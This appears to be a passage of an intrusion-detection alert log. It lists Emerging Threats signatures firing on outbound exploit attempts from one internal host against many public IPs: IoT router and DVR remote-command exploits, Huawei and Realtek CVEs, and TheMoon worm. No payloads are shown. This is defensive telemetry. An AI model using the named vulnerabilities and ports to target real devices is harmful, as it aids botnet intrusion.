Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 222.115.32.210

Timestamp:	03/18/24-09:58:54.487260
SID:	2023548
Source Port:	58332
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 192.91.218.48

Timestamp:	03/18/24-09:58:31.242236
SID:	2025883
Source Port:	55202
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.55.40

Timestamp:	03/18/24-09:58:29.159499
SID:	2018132
Source Port:	35080
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 183.120.136.94

Timestamp:	03/18/24-10:00:16.201838
SID:	2023548
Source Port:	45824
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 5.212.62.74

Timestamp:	03/18/24-10:00:01.824641
SID:	2023548
Source Port:	48420
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 177.22.141.32

Timestamp:	03/18/24-09:58:48.118867
SID:	2025883
Source Port:	34870
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 18.205.190.47

Timestamp:	03/18/24-09:59:37.627408
SID:	2030092
Source Port:	41432
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 182.162.94.17

Timestamp:	03/18/24-09:59:44.071556
SID:	2030092
Source Port:	58298
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 179.235.85.170

Timestamp:	03/18/24-09:57:07.943196
SID:	2023548
Source Port:	58670
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 5.77.20.225

Timestamp:	03/18/24-09:58:12.149980
SID:	2023548
Source Port:	56690
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.66.194.11

Timestamp:	03/18/24-09:59:43.501597
SID:	2018132
Source Port:	50906
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 51.159.102.233

Timestamp:	03/18/24-10:00:00.636685
SID:	2025576
Source Port:	55500
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 145.82.99.110

Timestamp:	03/18/24-09:58:32.365925
SID:	2023548
Source Port:	41194
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 23.40.210.21

Timestamp:	03/18/24-09:58:21.157179
SID:	2025883
Source Port:	50420
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 213.109.47.1

Timestamp:	03/18/24-09:59:05.636000
SID:	2030092
Source Port:	56008
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 124.169.187.217

Timestamp:	03/18/24-10:00:06.294406
SID:	2023548
Source Port:	43942
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 184.98.163.94

Timestamp:	03/18/24-09:59:41.931906
SID:	2023548
Source Port:	42584
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 97.92.53.216

Timestamp:	03/18/24-09:59:56.963694
SID:	2023548
Source Port:	55788
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 136.0.97.153

Timestamp:	03/18/24-09:58:19.093141
SID:	2030092
Source Port:	36590
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.250.170

Timestamp:	03/18/24-09:59:39.357616
SID:	2018132
Source Port:	46228
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 191.61.110.145

Timestamp:	03/18/24-09:58:52.878030
SID:	2027339
Source Port:	45080
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 104.112.112.104

Timestamp:	03/18/24-09:58:36.558813
SID:	2025576
Source Port:	58284
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 47.157.114.244

Timestamp:	03/18/24-09:58:50.350156
SID:	2023548
Source Port:	44296
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 47.187.168.226

Timestamp:	03/18/24-09:58:36.458969
SID:	2023548
Source Port:	36638
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 156.235.103.31

Timestamp:	03/18/24-09:58:27.163784
SID:	2835222
Source Port:	50942
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.4.93

Timestamp:	03/18/24-09:58:21.432415
SID:	2018132
Source Port:	54168
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.247.16.221

Timestamp:	03/18/24-09:57:00.479419
SID:	2023548
Source Port:	47874
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 82.78.8.129

Timestamp:	03/18/24-09:58:55.102034
SID:	2025576
Source Port:	39422
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 175.247.127.149

Timestamp:	03/18/24-09:59:10.532022
SID:	2023548
Source Port:	55392
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 74.131.43.223

Timestamp:	03/18/24-09:58:40.882516
SID:	2023548
Source Port:	44832
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 14.88.152.52

Timestamp:	03/18/24-09:57:04.179420
SID:	2023548
Source Port:	44484
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 181.171.202.175

Timestamp:	03/18/24-09:59:15.806916
SID:	2023548
Source Port:	33660
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 161.34.10.131

Timestamp:	03/18/24-09:59:34.010412
SID:	2025883
Source Port:	34652
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 177.69.78.135

Timestamp:	03/18/24-09:57:08.963203
SID:	2023548
Source Port:	40410
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.64.26.65

Timestamp:	03/18/24-09:58:18.135731
SID:	2018132
Source Port:	48644
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 18.134.19.143

Timestamp:	03/18/24-09:58:27.071333
SID:	2030092
Source Port:	48234
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 84.75.253.96

Timestamp:	03/18/24-09:58:33.269808
SID:	2023548
Source Port:	49392
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 104.103.93.208

Timestamp:	03/18/24-09:58:44.242348
SID:	2025883
Source Port:	44104
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 14.88.152.52

Timestamp:	03/18/24-09:57:04.459543
SID:	2023548
Source Port:	44494
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 104.129.40.240

Timestamp:	03/18/24-09:58:15.471628
SID:	2025883
Source Port:	42848
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 23.52.77.91

Timestamp:	03/18/24-09:57:05.992995
SID:	2030092
Source Port:	43248
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 192.161.162.136

Timestamp:	03/18/24-09:59:54.431994
SID:	2025883
Source Port:	53814
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 150.220.58.104

Timestamp:	03/18/24-09:59:17.278715
SID:	2023548
Source Port:	39352
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.243.200.180

Timestamp:	03/18/24-09:57:03.913803
SID:	2023548
Source Port:	58330
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.213.76

Timestamp:	03/18/24-09:57:05.345772
SID:	2018132
Source Port:	54576
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 35.229.111.46

Timestamp:	03/18/24-09:59:51.638789
SID:	2025883
Source Port:	43782
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 94.152.36.235

Timestamp:	03/18/24-09:58:55.093851
SID:	2025576
Source Port:	52414
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.156.227

Timestamp:	03/18/24-09:57:04.326618
SID:	2018132
Source Port:	48658
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 23.216.137.146

Timestamp:	03/18/24-09:56:59.969405
SID:	2030092
Source Port:	37150
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 107.178.243.68

Timestamp:	03/18/24-09:57:07.809595
SID:	2023548
Source Port:	60680
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 203.56.69.38

Timestamp:	03/18/24-09:58:38.192063
SID:	2025576
Source Port:	50250
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 222.104.180.25

Timestamp:	03/18/24-09:59:16.132183
SID:	2023548
Source Port:	54308
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.183.113

Timestamp:	03/18/24-09:58:29.077728
SID:	2018132
Source Port:	47896
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 152.160.75.15

Timestamp:	03/18/24-10:00:02.555451
SID:	2030092
Source Port:	44572
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 119.197.148.29

Timestamp:	03/18/24-09:58:11.989811
SID:	2025883
Source Port:	57886
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 173.33.97.108

Timestamp:	03/18/24-09:59:26.089381
SID:	2023548
Source Port:	54276
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 104.137.173.174

Timestamp:	03/18/24-10:00:22.893652
SID:	2023548
Source Port:	35502
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 121.162.236.139

Timestamp:	03/18/24-09:59:17.709742
SID:	2023548
Source Port:	55732
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 98.102.103.66

Timestamp:	03/18/24-09:59:19.306216
SID:	2018132
Source Port:	39188
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.167.241

Timestamp:	03/18/24-09:57:07.734261
SID:	2018132
Source Port:	48786
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 72.228.173.126

Timestamp:	03/18/24-09:57:03.619611
SID:	2025576
Source Port:	57098
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 52.202.239.22

Timestamp:	03/18/24-09:58:34.011081
SID:	2025883
Source Port:	45000
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 46.183.135.78

Timestamp:	03/18/24-09:58:36.385534
SID:	2025576
Source Port:	36068
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 119.206.182.2

Timestamp:	03/18/24-09:58:16.608916
SID:	2030092
Source Port:	52904
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 95.12.209.68

Timestamp:	03/18/24-09:58:24.432458
SID:	2023548
Source Port:	57370
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.116.111

Timestamp:	03/18/24-10:00:04.432467
SID:	2018132
Source Port:	35696
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.66.135.160

Timestamp:	03/18/24-10:00:25.457490
SID:	2018132
Source Port:	34918
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 191.13.51.79

Timestamp:	03/18/24-09:58:13.541883
SID:	2023548
Source Port:	34580
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 40.89.136.53

Timestamp:	03/18/24-09:58:36.422518
SID:	2025576
Source Port:	46842
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 20.228.136.20

Timestamp:	03/18/24-09:59:54.355930
SID:	2025883
Source Port:	42938
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 23.243.23.183

Timestamp:	03/18/24-09:57:08.883835
SID:	2023548
Source Port:	57700
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 176.212.201.242

Timestamp:	03/18/24-09:59:32.866170
SID:	2023548
Source Port:	39690
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 149.29.86.232

Timestamp:	03/18/24-10:00:10.408529
SID:	2025883
Source Port:	60264
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 38.48.61.102

Timestamp:	03/18/24-09:58:34.604435
SID:	2023548
Source Port:	51548
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 156.235.104.82

Timestamp:	03/18/24-09:56:59.726386
SID:	2829579
Source Port:	39488
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 5.76.238.20

Timestamp:	03/18/24-09:58:36.345292
SID:	2025576
Source Port:	40786
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 154.38.85.7

Timestamp:	03/18/24-10:00:14.909747
SID:	2025883
Source Port:	48206
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 149.71.61.26

Timestamp:	03/18/24-09:58:51.890364
SID:	2025883
Source Port:	57794
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.25.249

Timestamp:	03/18/24-09:58:42.166634
SID:	2018132
Source Port:	35610
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 112.184.68.60

Timestamp:	03/18/24-09:59:17.434134
SID:	2023548
Source Port:	54872
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 63.32.154.23

Timestamp:	03/18/24-09:59:58.122716
SID:	2030092
Source Port:	54496
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 66.113.235.104

Timestamp:	03/18/24-10:00:10.738413
SID:	2025576
Source Port:	43310
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 23.213.109.77

Timestamp:	03/18/24-09:59:41.378976
SID:	2030092
Source Port:	54992
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 49.12.111.150

Timestamp:	03/18/24-09:58:43.819299
SID:	2025576
Source Port:	37002
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 196.235.233.150

Timestamp:	03/18/24-09:58:32.088346
SID:	2023548
Source Port:	56670
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 181.24.19.129

Timestamp:	03/18/24-09:58:41.004835
SID:	2023548
Source Port:	49868
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 108.128.117.78

Timestamp:	03/18/24-10:00:18.971266
SID:	2025883
Source Port:	38746
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 23.205.39.176

Timestamp:	03/18/24-09:59:15.225435
SID:	2030092
Source Port:	37014
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.17.186

Timestamp:	03/18/24-09:59:27.734787
SID:	2018132
Source Port:	57428
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 115.14.109.57

Timestamp:	03/18/24-09:58:36.203034
SID:	2023548
Source Port:	48456
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 18.214.118.245

Timestamp:	03/18/24-09:59:01.268389
SID:	2030092
Source Port:	56650
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 218.32.46.149

Timestamp:	03/18/24-09:59:31.505546
SID:	2030092
Source Port:	46818
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.64.22.202

Timestamp:	03/18/24-09:58:21.516177
SID:	2018132
Source Port:	38588
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.93.154

Timestamp:	03/18/24-09:59:39.357572
SID:	2018132
Source Port:	45134
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 14.89.90.84

Timestamp:	03/18/24-09:58:18.549598
SID:	2023548
Source Port:	34514
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 208.53.227.38

Timestamp:	03/18/24-09:58:41.158166
SID:	2023548
Source Port:	60388
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.64.68.64

Timestamp:	03/18/24-10:00:18.505217
SID:	2018132
Source Port:	51236
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 49.0.94.169

Timestamp:	03/18/24-09:58:24.371741
SID:	2025883
Source Port:	51354
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.230.18.128

Timestamp:	03/18/24-09:59:01.526100
SID:	2023548
Source Port:	36090
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 121.179.211.210

Timestamp:	03/18/24-09:59:35.730524
SID:	2023548
Source Port:	44042
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.225.48.75

Timestamp:	03/18/24-10:00:16.039912
SID:	2023548
Source Port:	42332
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 38.48.61.102

Timestamp:	03/18/24-09:58:34.476920
SID:	2023548
Source Port:	51544
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 41.239.61.255

Timestamp:	03/18/24-10:00:11.614852
SID:	2835222
Source Port:	48710
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 51.75.219.79

Timestamp:	03/18/24-09:59:58.046074
SID:	2030092
Source Port:	58012
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 218.149.81.138

Timestamp:	03/18/24-09:58:32.146385
SID:	2023548
Source Port:	59100
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 88.99.216.194

Timestamp:	03/18/24-09:59:43.960566
SID:	2025883
Source Port:	56928
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.159.224

Timestamp:	03/18/24-09:56:51.436033
SID:	2018132
Source Port:	35514
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 51.15.203.55

Timestamp:	03/18/24-09:56:59.945610
SID:	2025883
Source Port:	38734
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 119.206.182.2

Timestamp:	03/18/24-09:58:16.608916
SID:	2025883
Source Port:	52904
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 206.189.8.131

Timestamp:	03/18/24-09:59:22.358021
SID:	2030092
Source Port:	48992
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 156.224.12.94

Timestamp:	03/18/24-09:59:08.616105
SID:	2829579
Source Port:	51970
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 211.252.58.166

